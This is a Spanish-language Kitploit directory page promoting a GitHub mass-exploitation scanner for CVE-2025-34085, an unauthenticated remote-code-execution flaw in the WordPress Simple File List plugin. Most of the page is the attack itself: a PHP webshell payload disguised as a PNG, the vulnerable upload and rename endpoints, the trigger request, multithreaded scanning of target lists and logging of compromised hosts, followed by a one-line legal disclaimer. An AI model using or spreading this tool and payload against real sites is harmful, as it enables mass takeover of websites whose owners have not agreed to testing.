Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-34085-Multi-target — Escáner RCE no autenticado multiobjetivo para CVE-2025-34085 que afecta al plugin WordPress Simple File List. Sube, renombra y desencadena webshells PHP en grandes conjuntos de objetivos. | Kitploit
Herramientas/GitHubGitHub/ill-deed/cve-2025-34085-multi-target
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHub
ill-deed/cve-2025-34085-multi-target

CVE-2025-34085-Multi-target

Escáner RCE no autenticado multiobjetivo para CVE-2025-34085 que afecta al plugin WordPress Simple File List. Sube, renombra y desencadena webshells PHP en grandes conjuntos de objetivos.

Ver Repositorio
3432hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-34085 Escáner RCE Multiobjetivo

Escáner de explotación masiva para CVE-2025-34085 — una vulnerabilidad de ejecución remota de código no autenticada en el plugin Simple File List de WordPress.

Esta herramienta sube un payload PHP disfrazado como imagen, lo renombra mediante un motor de archivos vulnerable y activa la ejecución de shell con un comando personalizado. Soporta escaneo multihilo en grandes conjuntos de objetivos.


🔥 Características

  • Escaneo multiobjetivo (desde targets.txt)
  • Subida automática y renombrado de payload malicioso
  • Activación de webshell con comando personalizable
  • Ejecución multihilo para velocidad
  • Registra RCE exitosos en vuln.txt

⚙️ Uso

root@kitploit:~
python3 CVE-2025-34085.py

Los objetivos deben listarse en targets.txt:

root@kitploit:~
example.com
http://target2.com
https://target3.com

🛠️ Configuración

Edita los siguientes valores en el script según sea necesario:

root@kitploit:~
COMMAND = "id"                      # Shell command to execute
EXPECTED_SUBSTRING = "uid="        # String to verify successful command execution
THREADS = 20                        # Number of concurrent threads

💡 Cómo Funciona

  1. Sube un archivo .png falso que contiene <?php system($_GET['cmd']); ?> a través del vulnerable ee-upload-engine.php.

  2. Lo renombra a .php, .phtml, etc. usando ee-file-engine.php.

  3. Envía una solicitud GET para activar el shell con cmd=id.

  4. Verifica el éxito basándose en la subcadena de salida esperada.


📂 Salida

Los aciertos exitosos se guardan en:

root@kitploit:~
vuln.txt

Cada línea incluye la URL vulnerable, la ruta del shell y la salida del comando.


🧪 Probado Contra

  • Plugin Simple File List de WordPress (versiones sin parche afectadas por CVE-2025-34085)
  • Configuraciones predeterminadas de Apache/Nginx con wp-content/uploads/ escribible

⚠️ Aviso Legal

Esta herramienta es solo para fines educativos y pruebas autorizadas. Úsala bajo tu propio riesgo. El acceso no autorizado a sistemas es ilegal.

Descargar herramienta